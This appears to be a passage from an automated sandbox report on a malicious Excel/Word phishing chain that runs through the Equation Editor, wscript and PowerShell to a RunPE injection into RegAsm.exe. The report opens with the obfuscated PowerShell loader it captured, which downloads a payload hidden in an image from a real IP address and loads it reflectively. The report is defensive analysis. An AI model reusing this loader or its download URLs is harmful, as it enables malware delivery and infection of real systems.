YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

11_2_0041CB50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00457106 push ecx; ret	11_2_00457119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045B11A push esp; ret	11_2_0045B141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0045E54D push esi; ret	11_2_0045E556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00457A28 push eax; ret	11_2_00457A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00434E56 push ecx; ret	11_2_00434E69

Source: 9.2.powershell.exe.2f0000.0.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 9.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 9.2.powershell.exe.2f0000.0.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 9.2.powershell.exe.624c918.3.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 9.2.powershell.exe.624c918.3.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 9.2.powershell.exe.624c918.3.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 9.2.powershell.exe.6961e7c.2.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 9.2.powershell.exe.6961e7c.2.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 9.2.powershell.exe.6961e7c.2.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\woi.gg\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\woi.gg\DavWWWRoot			Jump to behavior

AI detected suspicious Excel or Word document

Source: Office document

LLM: Score: 9 Reasons: The screenshot contains a visually prominent message stating 'This document is protected' alongside a Microsoft Office logo, which is a well-known brand. This can mislead users into believing the document is legitimate. The text creates a sense of urgency or necessity to access the document by implying it is protected and requires action to view it. This is a common tactic used in phishing attacks to prompt users to click on a link or button that may lead to a phishing page or malware download.

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File dump: hu.hu.huhuh[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: D58E1F0C.doc.4.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 6_2_005B2916 URLDownloadToFileW,ShellExecuteW,ExitProcess,

6_2_005B2916

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

11_2_0041AA4A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

11_2_0041CB50

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Swift tract-20240506_120.xls	Stream path 'Workbook' entropy: 7.99633445805 (max. 8.0)
Source: 56630000.0.dr	Stream path 'Workbook' entropy: 7.9963426344 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040F7A7 Sleep,ExitProcess,

11_2_0040F7A7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

11_2_0041A748

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599564	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 940	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6551	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 8807	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 441	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: foregroundWindowGot 1647	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1740	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3176	Thread sleep time: -60000s >= -30000s	Jump to behavior
